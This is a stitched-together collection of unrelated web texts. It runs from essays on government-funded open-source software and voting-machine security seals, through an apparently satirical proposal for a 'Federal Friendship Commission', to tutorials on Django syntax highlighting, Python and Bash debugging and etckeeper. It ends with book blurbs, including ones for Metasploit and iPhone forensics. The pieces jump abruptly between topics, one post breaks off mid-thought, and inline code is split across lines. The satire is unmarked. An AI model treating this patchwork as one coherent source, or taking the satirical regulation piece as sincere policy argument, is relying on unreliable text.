So how does this relate to FLOSS and government? Well first, let me set the stage, by pulling in a different strand of thought. The U.S. government pays to develop a lot of software. I think that in general, when “we the people” pay for software, then “we the people” should get it. The idea of paying for some software to be developed, and then giving long monopoly rights to a single company, seems to fly in the face of this. It doesn’t make sense from a cost viewpoint; when there’s a single monopoly supplier, the costs go up because there’s no effective competition! Some software shouldn’t be released to the public at all, but that is what classification and export controls are supposed to deal with. I’m sure there are exceptions, but currently we assume that when “we the people” pay to develop software, then “we the people” do not get the software, and that is absurd. If someone wants to have exclusive rights to some software, then he should spend all his time and money to develop it.
A fair retort to my argument is, "But does the government have the right to take an action that might reduce the profits of a business, or put it out of business?" In particular, if the government paid to develop software, can the government release that software as FLOSS if a private company sells equivalent proprietary software? After all, that private company would suddenly find itself competing with a less-expensive or free product!
Examining all relevant legal cases about this topic (releasing FLOSS when there is an existing proprietary product) would be daunting; I don’t pretend to have done that analysis. (If someone has done it, please tell me!) However, I think Charles River Bridge v. Warren Bridge can at least shed some light and is interesting to think about. After all, this is a major Supreme Court decision, so the ruling should be able to help us think about the issue of the government enabling a free service that competes with an existing business. In this case, the government knowingly created a competing free service, and as a result an existing business would no longer be able to make money from something it did have rights to. There were a lot of people who had bought stock in the first company, for a lot of money, and those stock holders expected to reap massive returns from their monopoly on an important local service. There were also a lot of ordinary citizens who were unhappy about this local monopoly, and wanted to get rid of the monopoly. There is another interesting similarity between the bridge case and the release of FLOSS: the government did not try to take away the existing bridge, instead, they enabled the re-development of a competing bridge. While it’s not the last word, this case about bridges can (I think) help us think about whether governments can release FLOSS if there’s already a proprietary program that does the same thing.
I would certainly agree that governments shouldn’t perform an action with the sole or primary purpose of putting a company out of business. But when governments release FLOSS they usually are not trying to put a proprietary company out of business as their primary purpose. In the case of Charles River Bridge vs. Warren Bridge, the government took action not because it wanted to put a company out of business, but because it wanted to help the public (in this case, by reducing use costs for key infrastructure). At least in this case, the Supreme Court clearly decided that a government can do something even if it hurts the profitability of some business. If they had ruled otherwise, government would be completely hamstrung; almost all government actions help someone and harm someone else. The point should be that the government should be trying to aid the community as a whole.
I think a reasonable take-away message from this case is that government should focus on the rights, happiness, and well-being of the community as a whole, even if some specific group would make less money — and that helping the community may involve making some goods or services (like FLOSS!) available at no cost.
Over the last few weeks, I've described the chaotic attempts of the State of New Jersey to come up with tamper-indicating seals and a seal use protocol to secure its voting machines.
A seal use protocol can allow the seal user to gain some assurance that the sealed material has not been tampered with. But here is the critical problem with using seals in elections: Who is the seal user that needs this assurance? It is not just election officials: it is the citizenry.
Democratic elections present a uniquely difficult set of problems to be solved by a security protocol. In particular, the ballot box or voting machine contains votes that may throw the government out of office. Therefore, it's not just the government—that is, election officials—that need evidence that no tampering has occurred, it's the public and the candidates. The election officials (representing the government) have a conflict of interest; corrupt election officials may hire corrupt seal inspectors, or deliberately hire incompetent inspectors, or deliberately fail to train them. Even if the public officials who run the elections are not at all corrupt, the democratic process requires sufficient transparency that the public (and the losing candidates) can be convinced that the process was fair.
In the late 19th century, after widespread, pervasive, and long-lasting fraud by election officials, democracies such as Australia and the United States implemented election protocols in an attempt to solve this problem. The struggle to achieve fair elections lasted for decades and was hard-fought.
A typical 1890s solution works as follows: At the beginning of election day, in the polling place, the ballot box is opened so that representatives of all political parties can see for themselves that it is empty (and does not contain hidden compartments). Then the ballot box is closed, and voting begins. The witnesses from all parties remain near the ballot box all day, so they can see that no one opens it and no one stuffs it. The box has a mechanism that rings a bell whenever a ballot is inserted, to alert the witnesses. At the close of the polls, the ballot box is opened, and the ballots are counted in the presence of witnesses.
In principle, then, there is no single person or entity that needs to be trusted: the parties watch each other.
Democratic elections pose difficult problems not just for security protocols in general, but for seal use protocols in particular. Consider the use of tamper-evident security seals in an election where a ballot box is to be protected by seals while it is transported and stored by election officials out of the sight of witnesses. A good protocol for the use of seals requires that seals be chosen with care and deliberation, and that inspectors have substantial and lengthy training on each kind of seal they are supposed to inspect. Without trained inspectors, it is all too easy for an attacker to remove and replace the seal without likelihood of detection.
Consider an audit or recount of a ballot box, days or weeks after an election. It reappears, from its custody in the hands of election officials, into the presence of witnesses from the political parties. The tamper-evident seals are inspected and removed—but by whom?
If elections are to be conducted by the same principles of transparency established over a century ago, the rationale for the selection of particular security seals must be made transparent to the public, to the candidates, and to the political parties. Witnesses from the parties and from the public must be able to receive training on detection of tampering of those particular seals. There must be (the possibility of) public debate and discussion over the effectiveness of these physical security protocols.
It is not clear that this is practical. To my knowledge, such transparency in seal use protocols has never been attempted.
Bibliographic citation for the research paper behind this whole series of posts:
Security Seals On Voting Machines: A Case Study, by Andrew W. Appel. Accepted for publication, ACM Transactions on Information and System Security (TISSEC), 2011.
Now that the FCC has finally acted to safeguard network neutrality, the time has come to take the next step toward creating a level playing field on the rest of the Information Superhighway. Network neutrality rules are designed to ensure that large telecommunications companies do not squelch free speech and online innovation. However, it is increasingly evident that broadband companies are not the only threat to the open Internet. In short, federal regulators need to act now to safeguard social network neutrality.
The time to examine this issue could not be better. Facebook is the dominant social network in countries other than Brazil, where everybody uses Friendster or something. Facebook has achieved near-monopoly status in the social networking market. It now dominates the web, permeating all aspects of the information landscape. More than 2.5 million websites have integrated with Facebook. Indeed, there is evidence that people are turning to social networks instead of faceless search engines for many types of queries.
Social networks will soon be the primary gatekeepers standing between average Internet users and the web’s promise of information utopia. But can we trust them with this new-found power? Friends are unlikely to be an unbiased or complete source of information on most topics, creating silos of ignorance among the disparate components of the social graph. Meanwhile, social networks will have the power to make or break Internet businesses built atop the enormous quantity of referral traffic they will be able to generate. What will become of these businesses when friendships and tastes change? For example, there is recent evidence that social networks are hastening the decline of the music industry by promoting unknown artists who provide their music and streaming videos for free.
Social network usage patterns reflect deep divisions of race and class. Unregulated social networks could rapidly become virtual gated communities, with users cut off from others who could provide them with a diversity of perspectives. Right now, there’s no regulation of the immense decision-influencing power that friends have, and there are no measures in place to ensure that friends provide a neutral and balanced set of viewpoints. Fortunately, policy-makers have a rare opportunity to preempt the dangerous consequences of leaving this new technology to develop unchecked.
The time has come to create a Federal Friendship Commission to ensure that the immense power of social networks is not abused. For example, social network users who have their friend requests denied currently have no legal recourse. Users should have the option to appeal friend rejections to the FFC to verify that they don’t violate social network neutrality. Unregulated social networks will give many users a distorted view of the world dominated by the partisan, religious, and cultural prejudices of their immediate neighbors in the social graph. The FFC can correct this by requiring social networks to give equal time to any biased wall post.
However, others have suggested lighter-touch regulation, simply requiring each person to have friends of many races, religions, and political persuasions. Still others have suggested allowing information harms to be remedied through direct litigation—perhaps via tort reform that recognizes a new private right of action against violations of the “duty to friend.” As social networking software will soon be found throughout all aspects of society, urgent intervention is needed to forestall “The Tyranny of The Farmville.”
Of course, social network neutrality is just one of the policy tools regulators should use to ensure a level playing field. For example, the Department of Justice may need to more aggressively employ its antitrust powers to combat the recent dangerous concentration of social networking market share on popular micro-blogging services. But enacting formal social network neutrality rules is an important first step towards a more open web.
Last week Mashable featured a post asking if location-based services are all just hype. Continuing the geolocation theme, Mashable has a new post, What the Future Holds for the Checkin, by a guest blogger/columnist. I have reservations about how well this article delves into future opportunities, so I'll toss a few out here.
I find Markdown to be a more readable and usable alternative to XHTML/CSS for formatting text, and I use it to format my articles at this Django-powered blog. When implementing syntax highlighting for code blocks within text, I searched for existing solutions and found many approaches that were too complicated and had shortcomings. After more research, I realized that syntax highlighting works out of the box in Django if you have a recent version of Markdown.
Here are the required steps to enable syntax highlighting in your Django application. First, install python-markdown version 2.0+ and python-pygments. Pygments is a syntax highlighter written in Python. Markdown 2.0+ has an extension system and comes with a syntax highlighting extension that uses Pygments. This extension is called CodeHilite. To use it, add the following to a Django template:
{% load markup %}
{{ text|markdown:'codehilite' }}
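One assumption worth stating: the markup template-tag library used above ships with Django's markup contrib app, so it needs to be enabled in your settings. A sketch of the relevant part of settings.py:

# settings.py (sketch): {% load markup %} is provided by the markup
# contrib app, which exposes the markdown/textile/restructuredtext filters.
INSTALLED_APPS = (
    # ... your other apps ...
    'django.contrib.markup',
)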
Next, you need to create a stylesheet that defines colors for syntax highlighting. To do so, run the following command:
$ pygmentize -S default -f html -a .codehilite > code.css
Include code.css
in your template.
Now, to create a syntax-highlighted code block, indent the block by 4 spaces and declare the language of the block at the first line, prefixed by :::
(3 colons). This is better explained by example. The following text:
:::python
print 'Hello, World.'
Produces the following syntax-highlighted code block:
print 'Hello, World.'
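If you'd like to check the conversion outside of a Django template (while debugging your setup, say), you can call python-markdown directly with the same extension. A minimal sketch, assuming python-markdown 2.0+ and Pygments are installed:

import markdown

text = """Here is some code:

    :::python
    print 'Hello, World.'
"""

# The codehilite extension hands indented code blocks to Pygments and wraps
# the result in a div with class "codehilite", which code.css then styles.
html = markdown.markdown(text, extensions=['codehilite'])
print html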
Keep in mind that Markdown allows embedded HTML elements by default. You shouldn't enable this if the source of the text is untrusted. To disable HTML elements, use the following in your Django template instead:
{% load markup %}
{{ text|markdown:'safe,codehilite' }}
Pygments supports a long list of languages and styles. Be sure to check the demos too.
I've been meaning to migrate my website from Drupal to Django for a very long time. Although Drupal is an excellent content management system, I got tired of working with PHP every time I wanted to add a feature or make a change. My previous web host didn't support Python so I had to stick with PHP. Recently however, I moved the website to a VPS at Linode and decided to migrate to Django as well.
Writing a blog application in Django took very little time thanks to the reusable apps that come with Django, like syndication, comments and admin. I also had to port the blog design to Django templates and migrate the content from HTML to Markdown. I've been using Markdown at StackOverflow and I really like it. It's concise, readable and much easier to work with in a text editor than HTML. I wrote a small script to convert existing articles from the subset of HTML that I was using to Markdown.
To run the website, I'm using Apache2/mod_wsgi for the backend, and nginx as a frontend. I chose mod_wsgi because it's very flexible. As for nginx, I chose it because it integrates nicely with StaticGenerator, a Django middleware that caches pages as files on local disk. StaticGenerator has an important advantage over using Memcached with Django: cached pages are served by nginx without hitting Django at all, so it's much faster. A quick benchmark on my setup showed that it was 8 times faster. StaticGenerator can only cache full pages, but this is fine for my needs.
The blog feed now contains full articles (as opposed to short summaries). This should be more convenient to those who read the blog via the feed.
I did a lightning talk at PyCon 2010 based on my Python debugging techniques article. Here is the video. My talk starts around 7:30:
And here are the slides:
This article covers several techniques for debugging Python programs. The applicability of these techniques ranges from simple scripts to complex applications. The topics that are covered include launching an interactive console from within your program, using the Python debugger, and implementing robust logging. Various tips are included along the way to help you debug and fix problems quickly and efficiently.
The Python interactive console is an awesome tool for experimenting with Python code. It provides a read-eval-print loop that allows you to experiment with Python code easily and quickly, without having to write and run a complete program. Wouldn't it be convenient if you could use the same technique to debug an existing program? Fortunately, this is already possible thanks to the code
module. This module has a function called interact()
that stops execution and gives you an interactive console to examine the current state of your program. To use this function, simply embed the following at the line where you want the console to start:
import code; code.interact(local=locals())
The resulting console inherits the local scope of the line on which code.interact()
is called. This enables you to check the current state of your program to understand its behavior and make any necessary corrections.
To exit the interactive console and continue with the execution of your program, press Ctrl+D
in Unix/Linux systems, or Ctrl+Z
in Windows. Alternatively, you can type exit()
in the console and hit enter to exit the console and abort your program.
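As a toy illustration (the function and variable names are invented for this example), dropping that one line inside a loop pauses the program at every iteration, with the loop's local variables available for inspection:

import code

def total_prices(prices):
    total = 0
    for price in prices:
        total += price
        # Execution pauses here on each iteration; 'price' and 'total' are
        # available in the console. Press Ctrl+D (or Ctrl+Z) to continue.
        code.interact(local=locals())
    return total

print total_prices([10, 25, 7])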
When you need to examine the execution flow of your program, an interactive console is not going to be enough. For situations like this, you can use the Python debugger. It provides a full-fledged debugging environment that supports breakpoints, stepping through source code, stack inspection and much more. This debugger comes with the standard python distribution as a module named pdb
.
To learn how to use pdb
, let's write a simple program that calculates the first 10 Fibonacci numbers:
def main():
    low, high = 0, 1
    for i in xrange(10):
        print high
        low, high = high, low + high

if __name__ == '__main__':
    main()
Assuming that the file name is fib.py
, we can run the program in pdb
using the following command:
$ python -m pdb fib.py
The command results in the following output:
> fib.py(1)<module>()
-> def main():
(Pdb)
The first line of output contains the current module name, line number and function name (function name currently appears as <module>()
because we are still at module level). The second line of output contains the current line of source code that is being executed. pdb
also provides an interactive console to debug the program. This console is different from the familiar Python console. You can see its commands by typing help
and hitting enter. Also, typing help <command>
gives you help on the command you provided. Let's learn about these commands.
The list
command prints a few lines of context around the current line. Let's give it a try:
(Pdb) list
  1  -> def main():
  2         low, high = 0, 1
  3         for i in xrange(10):
  4             print high
  5             low, high = high, low + high
  6
  7     if __name__ == '__main__':
  8         main()
[EOF]
Next, let's step through our program. The next
command executes the current line and moves to the next one.
(Pdb) next
> fib.py(7)<module>()
-> if __name__ == '__main__':
At this point, the main()
function has been defined, but not called. This is why the execution has jumped to the if
condition on line 7. Let's call next
again:
(Pdb) n
> fib.py(8)<module>()
-> main()
We are now about to call the main()
function. Running next
at this point will call main()
and move to the next line. Since we are at the end of the file, this means that the program will finish executing. But we don't want this; we want to step into the main()
function. To do this, we use the step
command:
(Pdb) step
--Call--
> fib.py(1)main()
-> def main():
From here, you can continue calling next
to step through the body of main()
. If at some point you want to examine the value of a variable, you can use the pp
command (short for pretty-print):
(Pdb) pp high
2
If you are done with examining the main()
function, you can either use the continue
command, which exits the debugging console and continues the execution of the program, or use the return
command, which continues the execution until the current function returns. Alternatively, you can stop the execution altogether and abort by using the exit
command.
Next, we will learn about breakpoints. More often than not, you want to invoke the debugger at a particular function or line number, rather than step through the execution of the whole program. To do so, you can set a breakpoint and continue the execution of the program. When the breakpoint is reached, the debugger is invoked.
To set a breakpoint, use the break
command. It takes a file name and line number or function name. To break at line 4 in fib.py, use:
(Pdb) break fib.py:4
To break when the main()
function is called, use:
(Pdb) break fib.main
Furthermore, you can attach a condition to the breakpoint. Execution breaks only if this condition is True
. For example, to break at line 4 in fib.py when high
is greater than 10, use:
(Pdb) break fib.py:4, high > 10
Now it's time for my favorite feature in pdb
. If you put the following snippet somewhere in your program and run it normally, execution stops and a debugging session starts when this line is reached:
import pdb; pdb.set_trace()
This approach is very convenient because it does not require launching your program in a special way or remembering to set breakpoints. You simply add the line above and start the program normally, and the debugger will be invoked exactly where you want. In practice, I think you will use this snippet to start pdb
most of the time.
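As an illustration (mine, not the article's), here is the Fibonacci program again with the snippet dropped into the loop; running it normally with python fib.py lands you in the debugger on the first iteration:

def main():
    low, high = 0, 1
    for i in xrange(10):
        import pdb; pdb.set_trace()   # execution stops here; use n, s, pp, c as usual
        print high
        low, high = high, low + high

if __name__ == '__main__':
    main()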
Finally, pdb
commands have short forms. The following table summarizes the commands presented in this section, and their short forms:
Command | Short form | Description |
---|---|---|
break | b | Set a breakpoint. |
continue | c | Continue with program execution. |
exit | q | Abort the program. |
help | h | Print list of commands or help for a given command. |
list | l | Show source code around current line. |
next | n | Execute the current line and move to the next one. |
pp | pp | Pretty-print the value of an expression. |
return | r | Continue execution until the current function returns. |
step | s | Step into the function called at the current line. |
A primitive way of debugging programs is to embed print statements throughout the code to track execution flow and state. However, this approach quickly becomes unmaintainable, not least because when debugging is over you have to hunt down and remove all the print statements that are scattered over the code.

Python provides an alternative to debug print statements that doesn't suffer from these shortcomings. This alternative comes in the form of a module called logging, and it is very powerful and easy to use.
Let's start with a simple example. The following snippet imports the logging
module and sets the logging level to debug:
import logging
logging.basicConfig(level=logging.DEBUG)
The call to logging.basicConfig()
should be done once when your program starts. Now, whenever you want to print a debug message, call logging.debug()
:
logging.debug('This is a debug message.')
This will send the following string to stderr
:
DEBUG:root:This is a debug message.
DEBUG
indicates that this is a debug message. root
indicates that this is the root logger, as it is possible to have multiple loggers (don't worry about this for now).
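If you are curious about those other loggers anyway, here is a tiny sketch (not part of the original text) of a named, per-module logger; logging.getLogger() is part of the standard library, and the logger name is just an example:

import logging

logging.basicConfig(level=logging.DEBUG)

# A logger named after a module; messages are tagged 'myapp.db' instead of 'root'.
log = logging.getLogger('myapp.db')
log.debug('Connecting to the database...')
# Prints: DEBUG:myapp.db:Connecting to the database...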
Now we have a better logging system that can be globally switched on and off. To turn off debug messages, simply omit the level
argument when calling logging.basicConfig()
:
logging.basicConfig()
To take full advantage of the logging
module, let's have a look at some of the options that can be provided to logging.basicConfig()
:
Argument | Description |
---|---|
filename | Send log messages to a file. |
filemode | The mode to open the file in (defaults to 'a' ). |
format | The format of log messages. |
datefmt | Date/time format of log messages. |
level | Level of messages to be printed (more on this later). |
For example, to configure the logging module to send debug messages to a file called debug.log
, use:
logging.basicConfig(level=logging.DEBUG, filename='debug.log')
Log messages will be appended to debug.log
if the file already exists. This means that your log messages will be kept even if you run your program multiple times.
To add date/time to your log messages, use:
logging.basicConfig(level=logging.DEBUG, filename='debug.log', format='%(asctime)s %(levelname)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
This will result in log messages like the following:
2009-08-30 23:30:49 DEBUG: This is a debug message.
The logging
module supports multiple levels of log messages in addition to DEBUG
. Here is the full list:
Level | Function |
---|---|
logging.CRITICAL | logging.critical() |
logging.ERROR | logging.error() |
logging.WARNING | logging.warning() |
logging.INFO | logging.info() |
logging.DEBUG | logging.debug() |
Setting the logging level to a value enables log messages for this level and all levels above it. So if you set the level to logging.WARNING
, you will get WARNING
, ERROR
and CRITICAL
messages. This allows you to have different levels of log verbosity.
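Here is a quick sketch of that filtering in action (my example, not the article's): with the level set to WARNING, the debug and info calls below produce no output, while the last three lines are printed.

import logging

logging.basicConfig(level=logging.WARNING)

logging.debug('Suppressed: below the WARNING threshold.')
logging.info('Suppressed as well.')
logging.warning('Printed.')
logging.error('Printed.')
logging.critical('Printed.')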
Before I conclude this section, I will provide a simple template for enabling logging functionality in your programs. This template uses command-line flags to change the logging level, which is more convenient than modifying source code.
import logging
import optparse

LOGGING_LEVELS = {'critical': logging.CRITICAL,
                  'error': logging.ERROR,
                  'warning': logging.WARNING,
                  'info': logging.INFO,
                  'debug': logging.DEBUG}

def main():
    parser = optparse.OptionParser()
    parser.add_option('-l', '--logging-level', help='Logging level')
    parser.add_option('-f', '--logging-file', help='Logging file name')
    (options, args) = parser.parse_args()
    logging_level = LOGGING_LEVELS.get(options.logging_level, logging.NOTSET)
    logging.basicConfig(level=logging_level, filename=options.logging_file,
                        format='%(asctime)s %(levelname)s: %(message)s',
                        datefmt='%Y-%m-%d %H:%M:%S')

    # Your program goes here.
    # You can access command-line arguments using the args variable.

if __name__ == '__main__':
    main()
By default, the logging
module prints critical, error and warning messages. To change this so that all levels are printed, use:
$ ./your-program.py --logging-level=debug
To send log messages to a file called debug.log
, use:
$ ./your-program.py --logging-level=debug --logging-file=debug.log
Bash is the default scripting language in most Linux systems. Its usage ranges from an interactive command interpreter to a scripting language for writing complex programs. Debugging facilities are a standard feature of compilers and interpreters, and bash is no different in this regard. In this article, I will explain various techniques and tips for debugging Bash scripts.
You can instruct Bash to print debugging output as it interprets your scripts. When running in this mode, Bash prints each command and its arguments before they are executed.
To see how this works, let's try it on an example script. The following simple script greets the user and prints the current date:
#!/bin/bash
echo "Hello $USER,"
echo "Today is $(date +'%Y-%m-%d')"
To trace the execution of the script, use bash -x
to run it:
$ bash -x example_script.sh
+ echo 'Hello ayman,'
Hello ayman,
++ date +%Y-%m-%d
+ echo 'Today is 2009-08-24'
Today is 2009-08-24
In this mode, Bash prints each command (with its expanded arguments) before executing it. Debugging output is prefixed with a number of +
signs to indicate nesting. This output helps you see exactly what the script is doing, and understand why it is not behaving as expected.
In large scripts, it may be helpful to prefix this debugging output with the script name, line number and function name. You can do this by setting the following environment variable:
export PS4='+${BASH_SOURCE}:${LINENO}:${FUNCNAME[0]}: '
Let's trace our example script again to see the new debugging output:
$ bash -x example_script.sh
+example_script.sh:2:: echo 'Hello ayman,'
Hello ayman,
++example_script.sh:3:: date +%Y-%m-%d
+example_script.sh:3:: echo 'Today is 2009-08-24'
Today is 2009-08-24
Sometimes, you are only interested in tracing one part of your script. This can be done by calling set -x
where you want to enable tracing, and calling set +x
to disable it. Let's apply this to our example script:
#!/bin/bash
echo "Hello $USER,"
set -x
echo "Today is $(date +'%Y-%m-%d')"
set +x
Now, let's run the script:
$ ./example_script.sh
Hello ayman,
++example_script.sh:4:: date +%Y-%m-%d
+example_script.sh:4:: echo 'Today is 2009-08-24'
Today is 2009-08-24
+example_script.sh:5:: set +x
Notice that we no longer need to run the script with bash -x
.
Tracing script execution is sometimes too verbose, especially if you are only interested in a limited number of events, like calling a certain function or entering a certain loop. In this case, it's better to log the events you are interested in. Logging can be achieved with something as simple as a function that prints a string to stderr
:
_log() {
    if [ "$_DEBUG" == "true" ]; then
        echo 1>&2 "$@"
    fi
}
Now you can embed logging messages into your script by calling this function:
_log "Copying files..."
cp src/* dst/
Log messages are printed only if the _DEBUG
variable is set to true
. This allows you to toggle the printing of log messages depending on your needs. You don't need to modify your script in order to change this variable; you can set it on the command line:
$ _DEBUG=true ./example_script.sh
If you are writing a complex script and you need a full-fledged debugger to debug it, then you can use bashdb, the Bash debugger. The debugger contains all the features that you would expect, like breakpoints, stepping in and out of functions, and attaching to running scripts. Its interface is a bit similar to gdb. You can read the documentation of bashdb for more information.
Keeping a version history of files under /etc
is essential for maintaining a healthy system. The benefits of tracking changes to /etc
include an audit trail of what changed and when, and the ability to roll back a change that breaks something.
You can set up your own repository to track changes to /etc
, or you can use a tool called etckeeper to handle the setup for you. This tool supports multiple version control systems, including Git, Mercurial and Bazaar. It integrates with the package management systems of a number of Linux distros, including APT (used by Debian, Ubuntu), YUM (RedHat, CentOS, Fedora), Pacman (Arch Linux). Using etckeeper instead of rolling your own has some advantages:
It automatically commits changes to /etc after installing packages, and it knows which files under /etc usually do not benefit from version control (like some cache files) and keeps them out of the repository.

Read on to learn how to install, configure and use etckeeper.
To install etckeeper on Debian or Ubuntu, run:
$ sudo apt-get install etckeeper
If you use another Linux distro, search the package list in your package manager. If etckeeper supports your system, you will probably find it there. Otherwise, you can download the source from the official site of etckeeper.
Next, let's configure etckeeper. Open /etc/etckeeper/etckeeper.conf
in your favorite editor. The first option that you need to look at is VCS
, which is the version control system you want to use. By default it's set to git
, but you can change it to hg
or bzr
depending on your preference. I use git myself, but most of this article should apply to etckeeper regardless of the version control system you choose.
Another option that I recommend looking at is AVOID_COMMIT_BEFORE_INSTALL
. By default, etckeeper will automatically commit any pending changes when you install packages. I find this behavior undesirable, as it may commit unfinished changes. I disable it by setting AVOID_COMMIT_BEFORE_INSTALL
to 1
.
If you installed etckeeper from source, have a look at HIGHLEVEL_PACKAGE_MANAGER
and LOWLEVEL_PACKAGE_MANAGER
and change them depending on the package manager of your system.
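Putting the options discussed so far together, a trimmed-down /etc/etckeeper/etckeeper.conf might look roughly like the excerpt below. Only the options mentioned in this article are shown, and the exact names and defaults in your copy may differ, so treat this as a sketch rather than a reference:

# /etc/etckeeper/etckeeper.conf (illustrative excerpt)
VCS="git"

# Don't auto-commit pending changes in /etc before package installation.
AVOID_COMMIT_BEFORE_INSTALL=1

# Mainly relevant for source installs; match your distro's tools.
HIGHLEVEL_PACKAGE_MANAGER=apt
LOWLEVEL_PACKAGE_MANAGER=dpkg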
With this, we are done with configuring etckeeper. Let's create a repository now:
$ cd /etc
$ sudo etckeeper init
$ sudo etckeeper commit "Initial import"
This will create an empty repository and then commit the contents of your /etc
directory to it.
From here, using etckeeper is no different from using the version control system you selected. Let's say you want to change your MySQL config; you can edit the file and then commit it as usual:
$ cd /etc
$ sudo vi /etc/mysql/my.cnf
$ sudo git commit -a -m "Commit message"
If you need to install a package in the middle of a change to /etc
, you need to record the change and revert to a clean state, install the package, and apply your recorded change again. In git, this is done like this:
$ cd /etc
$ sudo vi mysql/my.cnf        # Make a change.
$ sudo git stash              # Record the change and revert to a clean state.
$ sudo apt-get install bc     # Install a package.
$ sudo git stash apply        # Apply the recorded change.
See the man page of git-stash for more information.
Enormous quantities of data go unused or underused today, simply because people can't visualize the quantities and relationships in it. Using a downloadable programming environment developed by the author, Visualizing Data demonstrates methods for representing data accurately on the Web and elsewhere, complete with user interaction, animation, and more. How do the 3.1 billion A, C, G and T letters of the human genome compare to those of a chimp or a mouse? What do the paths that millions of visitors take through a web site look like? With Visualizing Data, you learn how to answer complex questions like these with thoroughly interactive displays. We're not talking about cookie-cutter charts and graphs. This book teaches you how to design entire interfaces around large, complex data sets with the help of a powerful new design and prototyping tool called "Processing." Used by many researchers and companies to convey specific data in a clear and understandable manner, the Processing beta is available free. With this tool and Visualizing Data as a guide, you'll learn basic visualization principles, how to choose the right kind of display for your purposes, and how to provide interactive features that will bring users to your site over and over. This book teaches you:
- The seven stages of visualizing data -- acquire, parse, filter, mine, represent, refine, and interact
- How all data problems begin with a question and end with a narrative construct that provides a clear answer without extraneous details
- Several example projects with the code to make them work
- Positive and negative points of each representation discussed; the focus is on customization so that each one best suits what you want to convey about your data set
The book does not provide ready-made "visualizations" that can be plugged into any data set. Instead, with chapters divided by types of data rather than types of display, you'll learn how each visualization conveys the unique properties of the data it represents -- why the data was collected, what's interesting about it, and what stories it can tell. Visualizing Data teaches you how to answer questions, not simply display information.
"This book is a must for anyone attempting to examine the iPhone. The level of forensic detail is excellent. If only all guides to forensics were written with this clarity!" -Andrew Sheldon, Director of Evidence Talks, computer forensics experts With iPhone use increasing in business networks, IT and security professionals face a serious challenge: these devices store an enormous amount of information. If your staff conducts business with an iPhone, you need to know how to recover, analyze, and securely destroy sensitive data. iPhone Forensics supplies the knowledge necessary to conduct complete and highly specialized forensic analysis of the iPhone, iPhone 3G, and iPod Touch. This book helps you: Determine what type of data is stored on the device Break v1.x and v2.x passcode-protected iPhones to gain access to the device Build a custom recovery toolkit for the iPhone Interrupt iPhone 3G's "secure wipe" process Conduct data recovery of a v1.x and v2.x iPhone user disk partition, and preserve and recover the entire raw user disk partition Recover deleted voicemail, images, email, and other personal data, using data carving techniques Recover geotagged metadata from camera photos Discover Google map lookups, typing cache, and other data stored on the live file system Extract contact information from the iPhone's database Use different recovery strategies based on case needs And more. iPhone Forensics includes techniques used by more than 200 law enforcement agencies worldwide, and is a must-have for any corporate compliance and disaster recovery plan.
This is the first book available for the Metasploit Framework (MSF), which is the attack platform of choice for one of the fastest growing careers in IT security: Penetration Testing. The book and companion Web site will provide professional penetration testers and security researchers with a fully integrated suite of tools for discovering, running, and testing exploit code. This book discusses how to use the Metasploit Framework (MSF) as an exploitation platform. The book begins with a detailed discussion of the three MSF interfaces: msfweb, msfconsole, and msfcli. This chapter demonstrates all of the features offered by the MSF as an exploitation platform. With a solid understanding of MSF's capabilities, the book then details techniques for dramatically reducing the amount of time required for developing functional exploits. By working through real-world vulnerabilities against popular closed source applications, the reader will learn how to use the tools and MSF to quickly build reliable attacks as standalone exploits. The section will also explain how to integrate an exploit directly into the Metasploit Framework by providing a line-by-line analysis of an integrated exploit module. Details as to how the Metasploit engine drives the behind-the-scenes exploitation process will be covered, and along the way the reader will come to understand the advantages of exploitation frameworks. The final section of the book examines the Meterpreter payload system and teaches readers to develop completely new extensions that will integrate fluidly with the Metasploit Framework.
· A November 2004 survey conducted by "CSO Magazine" stated that 42% of chief security officers considered penetration testing to be a security priority for their organizations
· The Metasploit Framework is the most popular open source exploit platform, and there are no competing books
· The book's companion Web site offers all of the working code and exploits contained within the book
A quick guide to everything anyone would want to know about the soaringly popular Internet programming language, Python. Provides an introduction to new features introduced in Python 1.6, and topics covered include regular expressions, extending Python, and OOP. The CD-ROM includes the source code for all of the examples in the text. Softcover.
Coauthored by Larry Wall, the creator of Perl, this book is the authoritative guide to Perl version 5, the scripting utility now established as the programming tool of choice for the World Wide Web, UNIX system administration, and a vast range of other applications. Learn how to use this versatile cross-platform programming language to solve unique programming challenges. This heavily revised second edition of Programming Perl contains a full explanation of Perl version 5.003 features. It covers Perl language and syntax, functions, library modules, references, and object-oriented features. It also explores invocation options for Perl and the utilities that come with it, debugging, common mistakes, efficiency, programming style, distribution and installation of Perl, and much more. Reviewers have called this book splendid, definitive, and well worth the price.
Pro Drupal Development is strongly recommended for any PHP programmer who wants a truly in-depth look at how Drupal works and how to make the most of it. — Michael J. Ross, Web developer/Slashdot contributor
Drupal is one of the most popular content management systems in use today. With it, you can create a variety of community-driven sites, including blogs, forums, wiki-style sites, and much more. Pro Drupal Development was written to arm you with knowledge to customize your Drupal installation however you see fit. The book assumes that you already possess the knowledge to install and bring a standard installation online. Then authors John VanDyk and Matt Westgate delve into Drupal internals, showing you how to truly take advantage of its powerful architecture. You'll learn how to create your own modules, develop your own themes, and produce your own filters. You'll learn the inner workings of each key part of Drupal, including user management, sessions, the node system, caching, and the various APIs available to you. Of course, your Drupal-powered site isn't effective until you can efficiently serve pages to your visitors. As such, the authors have included the information you need to optimize your Drupal installation to perform well under high-load situations. Also featured is information on Drupal security and best practices, as well as integration of Ajax and the internationalization of your Drupal web site. Simply put, if you are working with Drupal at all, then you need this book.
Named after the Monty Python comedy troupe, Python is an interpreted, open-source, object-oriented programming language. It's also free and runs portably on Windows, Mac OS, Unix, and other operating systems. Python can be used for all manner of programming tasks, from CGI scripts to full-fledged applications. It is gaining popularity among programmers in part because it is easier to read (and hence, debug) than most other programming languages, and it's generally simpler to install, learn, and use. Its line structure forces consistent indentation. Its syntax and semantics make it suitable for simple scripts and large programs. Its flexible data structures and dynamic typing allow you to get a lot done in a few lines. To learn it, you'll need some basic programming experience and a copy of Python: Visual QuickStart Guide. In patented Visual QuickStart Guide fashion, the book doesn't just tell you how to use Python to develop applications, it shows you, breaking Python into easy-to-digest, step-by-step tasks and providing example code. Python: Visual QuickStart Guide emphasizes the core language and libraries, which are the building blocks for programs. Author Chris Fehily starts with the basics - expressions, statements, numbers, strings - then moves on to lists, dictionaries, functions, and modules before wrapping things up with straightforward discussions of exceptions and classes. Some additional topics covered include:
- Object-oriented programming
- Working in multiple operating systems
- Structuring large programs
- Comparing Python to C, Perl, and Java
- Handling errors gracefully.
